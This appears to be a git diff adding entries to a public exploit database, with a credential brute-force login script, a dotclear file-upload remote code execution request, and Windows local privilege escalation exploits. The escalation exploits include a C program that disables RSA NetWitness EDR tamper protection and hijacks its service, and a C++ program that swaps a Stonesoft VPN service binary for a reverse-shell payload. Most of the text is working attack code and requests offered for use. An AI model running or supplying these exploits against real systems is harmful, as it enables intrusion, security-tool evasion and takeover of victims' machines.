r = session.get(url, verify=False)
# Getting CSRF token value
csrftoken = re.search(r'input type=\'hidden\' name=\'__csrf_magic\' value="(.*?)"', r.text)
csrftoken = csrftoken.group(1)
# Specifying Headers Value
headerscontent = {
'User-Agent': 'Mozilla/5.0',
'Referer': f"{url}",
'X-Forwarded-For': '42.42.42.42'
}
# POST REQ data
postreqcontent = {
'__csrf_magic': f"{csrftoken}",
'usernamefld': f"{userlogin}",
'passwordfld': f"{userpasswd}",
'login': 'Sign+In'
}
# Sending POST REQ
r = session.post(url, data=postreqcontent, headers=headerscontent, allow_redirects=False, verify=False)
# Conditional loops
if r.status_code != 200:
print(f'[*] - Found Valid Credential !!')
print(f"[*] - Use this Credential -> {userlogin}:{userpasswd}")
sys.exit(0)
# Reading User.txt & Pass.txt files
userfile = open(usersList).readlines()
passfile = open(passwdList).readlines()
for user in userfile:
user = user.strip()
for passwd in passfile:
passwd = passwd.strip()
login(user, passwd)

50
exploits/php/webapps/51353.txt Normal file
View file

@ -0,0 +1,50 @@
Exploit Title: dotclear 2.25.3 - Remote Code Execution (RCE) (Authenticated)
Application: dotclear
Version: 2.25.3
Bugs: Remote Code Execution (RCE) (Authenticated) via file upload
Technology: PHP
Vendor URL: https://dotclear.org/
Software Link: https://dotclear.org/download
Date of found: 08.04.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
While writing a blog post, we know that we can upload images. But php did not allow file upload. This time
<?php echo system("id"); ?>
I wrote a file with the above payload, a poc.phar extension, and uploaded it.
We were able to run the php code when we visited your page
poc request:
POST /dotclear/admin/post.php HTTP/1.1
Host: localhost
Content-Length: 566
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: dcxd=f3bb50e4faebea34598cf52bcef38548b68bc1cc
Connection: close
post_title=Welcome+to+Dotclear%21&post_excerpt=&post_content=%3Cp%3EThis+is+your+first+entry.+When+you%27re+ready+to+blog%2C+log+in+to+edit+or+delete+it.fghjftgj%3Ca+href%3D%22%2Fdotclear%2Fpublic%2Fpoc.phar%22%3Epoc.phar%3C%2Fa%3E%3C%2Fp%3E%0D%0A&post_notes=&id=1&save=Save+%28s%29&xd_check=ca4243338e38de355f21ce8a757c17fbca4197736275ba4ddcfced4a53032290d7b3c50badd4a3b9ceb2c8b3eed2fc3b53f0e13af56c68f2b934670027e12f4e&post_status=1&post_dt=2023-04-08T06%3A37&post_lang=en&post_format=xhtml&cat_id=&new_cat_title=&new_cat_parent=&post_open_comment=1&post_password=
poc video : https://youtu.be/oIPyLqLJS70

38
exploits/windows/dos/51348.txt Normal file
View file

@ -0,0 +1,38 @@
# Exploit Title: Microsoft Windows 11 - 'cmd.exe' Denial of Service
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Date: 2023-03-30
# Vendor Homepage: https://www.microsoft.com/en-us
# Software Link: https://www.microsoft.com/en-us
# Tested Version: N/A
# Tested on OS: Windows 11 Pro
# [ About App ]
Microsoft Windows is prone to a buffer-overflow vulnerability because the software fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.
An attacker can exploit this issue to crash the affected application, denying service to legitimate users. Arbitrary code execution may be possible, but this has not been confirmed.
This issue affects Microsoft Windows 11 Pro.
Note: Further analysis reveals that this is not a vulnerability; this BID is now retired.
# [ POC ]
# 1.Run the python script, it will create a new file "PoC.txt"
# 2.Run Command Prompt
# 3.Copy the content of the file "PoC.txt"
# 4.Paste the content of dos.txt into the lin cmd.exe
# 5.Crashed ;)
#!/usr/bin/env python
buffer = "A" * 339839907
payload = buffer
try:
    f=open("PoC.txt","w")
    print "[+] Creating %s evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"

44
exploits/windows/local/51332.txt Normal file
View file

@ -0,0 +1,44 @@
# Exploit Title: ActFax 10.10 - Unquoted Path Services
# Date: 22/03/2023
# Exploit Author: Birkan ALHAN (@taftss)
# Vendor Homepage: https://www.actfax.com
# Software Link: https://www.actfax.com/en/download.html
# Version: Version 10.10, Build 0551 (2023-02-01)
# Tested on: Windows 10 21H2 OS Build 19044.2728
#Discover to Unquoted Services Path:
C:\Users\taftss>sc qc ActiveFaxServiceNT
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: ActiveFaxServiceNT
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\ActiveFax\Server\ActSrvNT.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : ActiveFax-Server-Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\taftss>systeminfo
Host Name: RedsTaftss
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19044 N/A Build 19044
#Another Discover Methot to Unquoted Services Path:
wmic service get name,displayname,pathname,startmode | findstr /i
"auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
#Exploit:
If the attacker has taken over the system and the taken user has write
privileges to the "C:\Program Files\ActiveFax" folder or "C:\", they
can inject their own malicious "ActSrvNT.exe" file. Then the
ActiveFaxServiceNT Service can be restarted to privilege escalation.
--
*Birkan ALHAN*

285
exploits/windows/local/51336.txt Normal file
View file

@ -0,0 +1,285 @@
# Exploit Title: RSA NetWitness Platform 12.2 - Incorrect Access Control / Code Execution
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/RSA_NETWITNESS_EDR_AGENT_INCORRECT_ACCESS_CONTROL_CVE-2022-47529.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec
[Vendor]
RSA Security
www.netwitness.com
[Product]
NetWitness Endpoint EDR Agent
The RSA NetWitness detection and response (EDR) endpoint monitors activity across all your endpoints—on and off the network—providing deep visibility
into their security state, and it prioritizes alerts when there is an issue. NetWitness Endpoint drastically reduces dwell time by rapidly
detecting new and non-malware attacks that other EDR solutions miss, and it cuts the cost, time and scope of incident response.
[Vulnerability Type]
Incorrect Access Control / Code Execution
[CVE Reference]
CVE-2022-47529
[Security Issue]
CVE-2022-47529 allows local users to stop the Endpoint Windows agent from sending the events to SIEM or make the agent run user-supplied commands.
Insecure Win32 memory objects in Endpoint Windows Agents in the NetWitness Platform through 12.x allow local
and admin Windows user accounts to modify the endpoint agent service configuration:
to either disable it completely or run user-supplied code or commands, thereby bypassing tamper-protection features via ACL modification.
Interestingly, the agent was uploaded to virustotal on 2022-01-05 17:24:32 UTC months before finding and report.
SHA-256 770005f9b2333bf713ec533ef1efd2b65083a5cfb9f8cbb805ccb2eba423cc3d
LANDeskService.exe
[Severity]
Critical
[Impact(s)]
Denial-of-Service
Arbitrary Code Execution
[Attack Vector]
To exploit, open handle to memory objects held by the endpoint agent,
modify the ACL for the ones that have insecure ACLs, and DENY access to Everyone group
[Affected Product Code Base]
All versions prior to v12.2
[Network Access]
Local
[References]
https://community.netwitness.com/t5/netwitness-platform-security/nw-2023-04-netwitness-platform-security-advisory-cve-2022-47529/ta-p/696935
[Vuln Code Block]:
00000001400F7B10 sub_1400F7B10 proc near ; CODE XREF: sub_14012F6F0+19B?p
.text:00000001400F7B10 ; sub_14013BA50+19?p
.text:00000001400F7B10 ; DATA XREF: ...
.text:00000001400F7B10 push rbx
.text:00000001400F7B12 sub rsp, 20h
.text:00000001400F7B16 mov rbx, rcx
.text:00000001400F7B19 test rcx, rcx
.text:00000001400F7B1C jz short loc_1400F7B5C
.text:00000001400F7B1E call cs:InitializeCriticalSection
.text:00000001400F7B24 lea rcx, [rbx+28h] ; lpCriticalSection
.text:00000001400F7B28 call cs:InitializeCriticalSection
.text:00000001400F7B2E mov edx, 1 ; bManualReset
.text:00000001400F7B33 xor r9d, r9d ; lpName
.text:00000001400F7B36 mov r8d, edx ; bInitialState
.text:00000001400F7B39 xor ecx, ecx ; lpEventAttributes
.text:00000001400F7B3B call cs:CreateEventW
.text:00000001400F7B41 mov [rbx+50h], rax
.text:00000001400F7B45 mov dword ptr [rbx+58h], 0
.text:00000001400F7B4C test rax, rax
.text:00000001400F7B4F jz short loc_1400F7B5C
[Exploit/POC]
"RSA_NetWitness_Exploit.c"
#include "windows.h"
#include "stdio.h"
#include "accctrl.h"
#include "aclapi.h"
#define OPEN_ALL_ACCESS 0x1F0003
/*
RSA NetWitness EDR Endpoint Agent
Tamper Protection Bypass / EoP Code Execution
RSA NetWitness.msi --> NWEAgent.exe
MD5: c0aa7e52cbf7799161bac9ebefa38d49
Expected result: Low privileged standard users are prevented from interfering with and or modifying events for the RSA Endpoint Agent.
Actual result: RSA NetWitness Endpoint Agent is terminated by a low privileged standard non-administrator user.
By John Page (hyp3rlinx) - Nov 2022
DISCLAIMER: The author of this code is not responsible or liable for any damages whatsoever from testing, modifying and or misuse.
Users of this supplied PoC code accept all risks, do no harm.
X64 PE file vuln code block:
00000001400F7B10 sub_1400F7B10 proc near ; CODE XREF: sub_14012F6F0+19B?p
.text:00000001400F7B10 ; sub_14013BA50+19?p
.text:00000001400F7B10 ; DATA XREF: ...
.text:00000001400F7B10 push rbx
.text:00000001400F7B12 sub rsp, 20h
.text:00000001400F7B16 mov rbx, rcx
.text:00000001400F7B19 test rcx, rcx
.text:00000001400F7B1C jz short loc_1400F7B5C
.text:00000001400F7B1E call cs:InitializeCriticalSection
.text:00000001400F7B24 lea rcx, [rbx+28h] ; lpCriticalSection
.text:00000001400F7B28 call cs:InitializeCriticalSection
.text:00000001400F7B2E mov edx, 1 ; bManualReset
.text:00000001400F7B33 xor r9d, r9d ; lpName
.text:00000001400F7B36 mov r8d, edx ; bInitialState
.text:00000001400F7B39 xor ecx, ecx ; lpEventAttributes
.text:00000001400F7B3B call cs:CreateEventW
.text:00000001400F7B41 mov [rbx+50h], rax
.text:00000001400F7B45 mov dword ptr [rbx+58h], 0
.text:00000001400F7B4C test rax, rax
.text:00000001400F7B4F jz short loc_1400F7B5C
1) Install "RSA NetWitness.msi" (Endpoint EDR Agent)
2) Run Exploit PoC as a Standard non-admin user, the PoC will:
a) Open a handle (copy) to Ecat002 event.
b) Open additional handles for events Ecat004 and Ecat002, modifying them to deny access to Everyone group.
c) Set/Reset event the Ecat002 handle.
d) if admin privs change the EDR service configuration
Non vulnerable agents will output "Not vulnerable to the console", customers can modify and use test to see if vuln.
*/
char Vuln_Events[][32] = {"Global\\Ecat004", "Global\\Ecat002"};
BOOL PWNED=FALSE;
void Exploit();
int AdminChl();
void HijackSvcConfig();
int main(void){
printf("[+] RSA NetWitness EDR Agent 0Day\n");
printf("[+] CVE-2022-47529\n");
printf("[+] Discovery: John Page (aka hyp3rlinx)\n");
printf("[+] ===================================\n");
Exploit();
if( AdminChk() ){
printf("[+] Hijacked NetWitness Agent Service!\n");
HijackSvcConfig();
}
Sleep(2000);
printf("[+] Done!\n\n");
system("pause");
return 0;
}
void Exploit(){
PACL pOldDACL = NULL;
PACL pNewDACL = NULL;
HANDLE hEvent_Ecat002 = OpenEventA(OPEN_ALL_ACCESS,FALSE,(LPCSTR)"Global\\Ecat002");
int i=0;
for(; i < sizeof(Vuln_Events) / sizeof(Vuln_Events[0]); i++){
HANDLE hEvent = OpenEventA(OPEN_ALL_ACCESS,FALSE,(LPCSTR)Vuln_Events[i]);
if(hEvent != INVALID_HANDLE_VALUE){
printf("[-] Targeting Event: %s\n", Vuln_Events[i]);
Sleep(500);
if(GetSecurityInfo(hEvent, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, &pOldDACL, NULL, NULL) == ERROR_SUCCESS){
TRUSTEE trustee[1];
trustee[0].TrusteeForm = TRUSTEE_IS_NAME;
trustee[0].TrusteeType = TRUSTEE_IS_GROUP;
trustee[0].ptstrName = TEXT("Everyone");
trustee[0].MultipleTrusteeOperation = NO_MULTIPLE_TRUSTEE;
trustee[0].pMultipleTrustee = NULL;
EXPLICIT_ACCESS explicit_access_list[1];
ZeroMemory(&explicit_access_list[0], sizeof(EXPLICIT_ACCESS));
explicit_access_list[0].grfAccessMode = DENY_ACCESS;
explicit_access_list[0].grfAccessPermissions = GENERIC_ALL;
explicit_access_list[0].grfInheritance = NO_INHERITANCE;
explicit_access_list[0].Trustee = trustee[0];
if(SetEntriesInAcl(1, explicit_access_list, pOldDACL, &pNewDACL) != ERROR_SUCCESS){
printf("%s%d", "[!] Not vulnerable! ", GetLastError());
}
if(SetSecurityInfo(hEvent, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDACL, NULL) != ERROR_SUCCESS){
printf("%s%d", "[!] Not vulnerable! ", GetLastError());
}else{
SetEvent(hEvent_Ecat002);
Sleep(1000);
ResetEvent(hEvent_Ecat002);
CloseHandle(hEvent_Ecat002);
SetEvent(hEvent);
Sleep(1000);
PWNED=TRUE;
}
if(PWNED){
LocalFree(pNewDACL);
LocalFree(pOldDACL);
CloseHandle(hEvent);
}
Sleep(1000);
}
}
}
}
//If run as admin, modify the agent service config to run our own code.
int AdminChk(){
int result = 0;
HANDLE hToken = NULL;
if(OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY,&hToken)){
TOKEN_ELEVATION elevated;
DWORD tokSize = sizeof(TOKEN_ELEVATION);
if(GetTokenInformation(hToken, TokenElevation, &elevated, sizeof(elevated), &tokSize)){
result = elevated.TokenIsElevated;
}
}
if(hToken){
CloseHandle(hToken);
}
return result;
}
//Trivial example modify the service config...
void HijackSvcConfig(){
Sleep(1000);
WinExec("sc failure NWEAgent command= ""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" "Evil-Command-Here""", 0);
}
[POC Video URL]
https://www.youtube.com/watch?v=kO1fu4IOlSs
[Disclosure Timeline]
Vendor Notification: December 2, 2022
CVE assigned: December 19, 2022
Hotfix v12.1.0.1: January 3, 2023
Fixed in v12.2.0.0 January 4, 2023
Restested for vendor: January 6, 2023
March 24, 2023 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx

140
exploits/windows/local/51341.txt Normal file
View file

@ -0,0 +1,140 @@
# Exploit Title: Stonesoft VPN Client 6.2.0 / 6.8.0 - Local Privilege Escalation
# Exploit Author : TOUHAMI KASBAOUI
# Vendor Homepage : https://www.forcepoint.com/
# Software: Stonesoft VPN Windows
# Version : 6.2.0 / 6.8.0
# Tested on : Windows 10
# CVE : N/A
#Description local privilege escalation vertical from Administrator to NT AUTHORITY / SYSTEM
#define UNICODE
#define _UNICODE
#include <Windows.h>
#include <iostream>
using namespace std;
enum Result
{
unknown,
serviceManager_AccessDenied,
serviceManager_DatabaseDoesNotExist,
service_AccessDenied,
service_InvalidServiceManagerHandle,
service_InvalidServiceName,
service_DoesNotExist,
service_Exist
};
Result ServiceExists(const std::wstring& serviceName)
{
Result r = unknown;
SC_HANDLE manager = OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, GENERIC_READ);
if (manager == NULL)
{
DWORD lastError = GetLastError();
if (lastError == ERROR_ACCESS_DENIED)
return serviceManager_AccessDenied;
else if (lastError == ERROR_DATABASE_DOES_NOT_EXIST)
return serviceManager_DatabaseDoesNotExist;
else
return unknown;
}
SC_HANDLE service = OpenService(manager, serviceName.c_str(), GENERIC_READ);
if (service == NULL)
{
DWORD error = GetLastError();
if (error == ERROR_ACCESS_DENIED)
r = service_AccessDenied;
else if (error == ERROR_INVALID_HANDLE)
r = service_InvalidServiceManagerHandle;
else if (error == ERROR_INVALID_NAME)
r = service_InvalidServiceName;
else if (error == ERROR_SERVICE_DOES_NOT_EXIST)
r = service_DoesNotExist;
else
r = unknown;
}
else
r = service_Exist;
if (service != NULL)
CloseServiceHandle(service);
if (manager != NULL)
CloseServiceHandle(manager);
return r;
}
bool ChangeName() {
LPCWSTR parrentvpnfilename = L"C:\\Program Files (x86)\\Forcepoint\\Stonesoft VPN Client\\sgvpn.exe";
LPCWSTR newName = L"C:\\Program Files (x86)\\Forcepoint\\Stonesoft VPN Client\\sgvpn_old.exe";
bool success = MoveFile(parrentvpnfilename, newName);
if (success) {
cerr << "[+] SVGVPN filename changed.\n";
}
else {
cerr << "Failed to rename file \n";
}
return 0;
}
int main() {
const uint8_t shellcode[7168] = {
0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0x00,
0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
}; //You can set array bin of your reverse shell PE file here
std::wstring serviceName = L"sgipsecvpn";
Result result = ServiceExists(serviceName);
if (result == service_Exist)
std::wcout << L"The VPN service '" << serviceName << "' exists." << std::endl;
else if (result == service_DoesNotExist)
std::wcout << L"The service '" << serviceName << "' does not exist." << std::endl;
else
std::wcout << L"An error has occurred, and it could not be determined whether the service '" << serviceName << "' exists or not." << std::endl;
ChangeName();
HANDLE fileHandle = CreateFile(L"C:\\Program Files (x86)\\Forcepoint\\Stonesoft VPN Client\\sgvpn.exe", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
cerr << "[*] Loading Malicious file into main PE of Forcepoint Installer \n";
if (fileHandle == INVALID_HANDLE_VALUE) {
cerr << "Failed to create shellcode\n";
return 1;
}
DWORD bytesWritten;
if (!WriteFile(fileHandle, shellcode, sizeof(shellcode), &bytesWritten, NULL)) {
cerr << "Failed to write to file\n";
CloseHandle(fileHandle);
return 1;
}
CloseHandle(fileHandle);
cout << "[+] Payload exported to ForcePointVPN \n";
Sleep(30);
cout << "[+] Restart ForcePointVPN Service \n";
SC_HANDLE scmHandle = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
SC_HANDLE serviceHandle = OpenService(scmHandle, TEXT("sgipsecvpn"), SERVICE_ALL_ACCESS);
SERVICE_STATUS serviceStatus;
QueryServiceStatus(serviceHandle, &serviceStatus);
if (serviceStatus.dwCurrentState == SERVICE_RUNNING) {
ControlService(serviceHandle, SERVICE_CONTROL_STOP, &serviceStatus);
while (serviceStatus.dwCurrentState != SERVICE_STOPPED) {
QueryServiceStatus(serviceHandle, &serviceStatus);
Sleep(1000);
}
}
StartService(serviceHandle, NULL, NULL);
CloseServiceHandle(serviceHandle);
CloseServiceHandle(scmHandle);
return 0;
}

23
exploits/windows/local/51351.txt Normal file
View file

@ -0,0 +1,23 @@
# Exploit Title: ESET Service 16.0.26.0 - 'Service ekrn' Unquoted Service Path
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Exploit Date: 2023-04-05
# Vendor : https://www.eset.com
# Version : 16.0.26.0
# Tested on OS: Microsoft Windows 11 pro x64
#PoC :
==============
C:\>sc qc ekrn
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: ekrn
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\ESET\ESET Security\ekrn.exe"
        LOAD_ORDER_GROUP   : Base
        TAG                : 0
        DISPLAY_NAME       : ESET Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

33
files_exploits.csv
View file

@ -904,6 +904,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48217,exploits/asp/webapps/48217.txt,"Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery (Add Admin)",2020-03-16,"Miguel Mendez Z",webapps,asp,,2020-03-16,2020-03-16,0,,,,,, 48217,exploits/asp/webapps/48217.txt,"Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery (Add Admin)",2020-03-16,"Miguel Mendez Z",webapps,asp,,2020-03-16,2020-03-16,0,,,,,,
27945,exploits/asp/webapps/27945.txt,"Enigma Haber 4.2 - Cross-Site Scripting",2006-06-02,The_BeKiR,webapps,asp,,2006-06-02,2013-08-30,1,CVE-2006-2873;OSVDB-26230,,,,,https://www.securityfocus.com/bid/18226/info 27945,exploits/asp/webapps/27945.txt,"Enigma Haber 4.2 - Cross-Site Scripting",2006-06-02,The_BeKiR,webapps,asp,,2006-06-02,2013-08-30,1,CVE-2006-2873;OSVDB-26230,,,,,https://www.securityfocus.com/bid/18226/info
1840,exploits/asp/webapps/1840.txt,"Enigma Haber 4.3 - Multiple SQL Injections",2006-05-28,nukedx,webapps,asp,,2006-05-27,,1,OSVDB-26119;CVE-2006-2731;OSVDB-26118;OSVDB-26117;OSVDB-26116;OSVDB-26115;OSVDB-26114;OSVDB-26113;OSVDB-26112;OSVDB-26111;OSVDB-26110;OSVDB-26109;OSVDB-26108;OSVDB-26107;OSVDB-26106,,,,,http://www.nukedx.com/?viewdoc=34 1840,exploits/asp/webapps/1840.txt,"Enigma Haber 4.3 - Multiple SQL Injections",2006-05-28,nukedx,webapps,asp,,2006-05-27,,1,OSVDB-26119;CVE-2006-2731;OSVDB-26118;OSVDB-26117;OSVDB-26116;OSVDB-26115;OSVDB-26114;OSVDB-26113;OSVDB-26112;OSVDB-26111;OSVDB-26110;OSVDB-26109;OSVDB-26108;OSVDB-26107;OSVDB-26106,,,,,http://www.nukedx.com/?viewdoc=34
51335,exploits/asp/webapps/51335.txt,"ENTAB ERP 1.0 - Username PII leak",2023-04-08,"Deb Prasad Banerjee",webapps,asp,,2023-04-08,2023-04-08,0,CVE-2022-30076,,,,,
2989,exploits/asp/webapps/2989.txt,"Enthrallweb eCars 1.0 - 'types.asp' SQL Injection",2006-12-23,ajann,webapps,asp,,2006-12-22,,1,OSVDB-31681;CVE-2006-6803,,,,, 2989,exploits/asp/webapps/2989.txt,"Enthrallweb eCars 1.0 - 'types.asp' SQL Injection",2006-12-23,ajann,webapps,asp,,2006-12-22,,1,OSVDB-31681;CVE-2006-6803,,,,,
29118,exploits/asp/webapps/29118.txt,"Enthrallweb eClassifieds - 'ad.asp' Multiple SQL Injections",2006-11-20,"laurent gaffie",webapps,asp,,2006-11-20,2013-10-22,1,CVE-2006-6208;OSVDB-30571,,,,,https://www.securityfocus.com/bid/21192/info 29118,exploits/asp/webapps/29118.txt,"Enthrallweb eClassifieds - 'ad.asp' Multiple SQL Injections",2006-11-20,"laurent gaffie",webapps,asp,,2006-11-20,2013-10-22,1,CVE-2006-6208;OSVDB-30571,,,,,https://www.securityfocus.com/bid/21192/info
29119,exploits/asp/webapps/29119.txt,"Enthrallweb eClassifieds - 'dircat.asp?cid' SQL Injection",2006-11-20,"laurent gaffie",webapps,asp,,2006-11-20,2013-10-22,1,CVE-2006-6208;OSVDB-30572,,,,,https://www.securityfocus.com/bid/21192/info 29119,exploits/asp/webapps/29119.txt,"Enthrallweb eClassifieds - 'dircat.asp?cid' SQL Injection",2006-11-20,"laurent gaffie",webapps,asp,,2006-11-20,2013-10-22,1,CVE-2006-6208;OSVDB-30572,,,,,https://www.securityfocus.com/bid/21192/info
@ -1834,7 +1835,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48456,exploits/aspx/webapps/48456.txt,"Orchard Core RC1 - Persistent Cross-Site Scripting",2020-05-12,SunCSR,webapps,aspx,,2020-05-12,2020-05-12,0,,,,,, 48456,exploits/aspx/webapps/48456.txt,"Orchard Core RC1 - Persistent Cross-Site Scripting",2020-05-12,SunCSR,webapps,aspx,,2020-05-12,2020-05-12,0,,,,,,
41985,exploits/aspx/webapps/41985.txt,"Personify360 7.5.2/7.6.1 - Improper Access Restrictions",2017-05-09,"Pesach Zirkind",webapps,aspx,,2017-05-09,2017-07-03,0,CVE-2017-7312,,,,, 41985,exploits/aspx/webapps/41985.txt,"Personify360 7.5.2/7.6.1 - Improper Access Restrictions",2017-05-09,"Pesach Zirkind",webapps,aspx,,2017-05-09,2017-07-03,0,CVE-2017-7312,,,,,
41986,exploits/aspx/webapps/41986.txt,"Personify360 7.5.2/7.6.1 - Improper Database Schema Access Restrictions",2017-05-09,"Pesach Zirkind",webapps,aspx,,2017-05-09,2017-07-03,0,CVE-2017-7314,,,,, 41986,exploits/aspx/webapps/41986.txt,"Personify360 7.5.2/7.6.1 - Improper Database Schema Access Restrictions",2017-05-09,"Pesach Zirkind",webapps,aspx,,2017-05-09,2017-07-03,0,CVE-2017-7314,,,,,
51118,exploits/aspx/webapps/51118.txt,"ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS)",2023-03-28,"Okan Kurtulus",webapps,aspx,,2023-03-28,2023-03-28,0,CVE-2022-41441,,,,, 51118,exploits/aspx/webapps/51118.txt,"ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS)",2023-03-28,"Okan Kurtulus",webapps,aspx,,2023-03-28,2023-04-08,0,CVE-2022-41441,,,,,
47777,exploits/aspx/webapps/47777.txt,"Roxy Fileman 1.4.5 - Directory Traversal",2019-12-16,"Patrik Lantz",webapps,aspx,,2019-12-16,2019-12-18,0,CVE-2019-19731,,,,, 47777,exploits/aspx/webapps/47777.txt,"Roxy Fileman 1.4.5 - Directory Traversal",2019-12-16,"Patrik Lantz",webapps,aspx,,2019-12-16,2019-12-18,0,CVE-2019-19731,,,,,
47589,exploits/aspx/webapps/47589.txt,"SD.NET RIM 4.7.3c - 'idtyp' SQL Injection",2019-11-05,"Fabian Mosch_ Nick Theisinger",webapps,aspx,80,2019-11-05,2019-11-05,0,,"SQL Injection (SQLi)",,,, 47589,exploits/aspx/webapps/47589.txt,"SD.NET RIM 4.7.3c - 'idtyp' SQL Injection",2019-11-05,"Fabian Mosch_ Nick Theisinger",webapps,aspx,80,2019-11-05,2019-11-05,0,,"SQL Injection (SQLi)",,,,
44285,exploits/aspx/webapps/44285.txt,"SecurEnvoy SecurMail 9.1.501 - Multiple Vulnerabilities",2018-03-13,"SEC Consult",webapps,aspx,,2018-03-13,2018-03-13,0,CVE-2018-7707;CVE-2018-7706;CVE-2018-7705;CVE-2018-7704;CVE-2018-7703;CVE-2018-7702;CVE-2018-7701,,,,, 44285,exploits/aspx/webapps/44285.txt,"SecurEnvoy SecurMail 9.1.501 - Multiple Vulnerabilities",2018-03-13,"SEC Consult",webapps,aspx,,2018-03-13,2018-03-13,0,CVE-2018-7707;CVE-2018-7706;CVE-2018-7705;CVE-2018-7704;CVE-2018-7703;CVE-2018-7702;CVE-2018-7701,,,,,
@ -2795,6 +2796,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
4261,exploits/cgi/webapps/4261.txt,"YNP Portal System 2.2.0 - 'showpage.cgi p' Remote File Disclosure",2007-08-06,GoLd_M,webapps,cgi,,2007-08-05,,1,OSVDB-39198;CVE-2007-4256,,,,, 4261,exploits/cgi/webapps/4261.txt,"YNP Portal System 2.2.0 - 'showpage.cgi p' Remote File Disclosure",2007-08-06,GoLd_M,webapps,cgi,,2007-08-05,,1,OSVDB-39198;CVE-2007-4256,,,,,
30260,exploits/cgi/webapps/30260.txt,"Yoggie Pico and Pico Pro Backticks - Remote Code Execution",2007-07-02,"Cody Brocious",webapps,cgi,,2007-07-02,2013-12-13,1,CVE-2007-3572;OSVDB-37808,,,,,https://www.securityfocus.com/bid/24743/info 30260,exploits/cgi/webapps/30260.txt,"Yoggie Pico and Pico Pro Backticks - Remote Code Execution",2007-07-02,"Cody Brocious",webapps,cgi,,2007-07-02,2013-12-13,1,CVE-2007-3572;OSVDB-37808,,,,,https://www.securityfocus.com/bid/24743/info
39156,exploits/cgi/webapps/39156.txt,"ZamFoo - Multiple Remote Command Execution Vulnerabilities",2014-04-02,Al-Shabaab,webapps,cgi,,2014-04-02,2016-01-03,1,,,,,,https://www.securityfocus.com/bid/67215/info 39156,exploits/cgi/webapps/39156.txt,"ZamFoo - Multiple Remote Command Execution Vulnerabilities",2014-04-02,Al-Shabaab,webapps,cgi,,2014-04-02,2016-01-03,1,,,,,,https://www.securityfocus.com/bid/67215/info
51347,exploits/cgi/webapps/51347.txt,"ZCBS/ZBBS/ZPBS v4.14k - Reflected Cross-Site Scripting (XSS)",2023-04-08,"Abdulaziz Saad",webapps,cgi,,2023-04-08,2023-04-08,0,CVE-2023-26692,,,,,
37830,exploits/cgi/webapps/37830.txt,"ZEN Load Balancer - Multiple Vulnerabilities",2012-09-24,"Brendan Coles",webapps,cgi,,2012-09-24,2016-12-18,1,,,,,,https://www.securityfocus.com/bid/55638/info 37830,exploits/cgi/webapps/37830.txt,"ZEN Load Balancer - Multiple Vulnerabilities",2012-09-24,"Brendan Coles",webapps,cgi,,2012-09-24,2016-12-18,1,,,,,,https://www.securityfocus.com/bid/55638/info
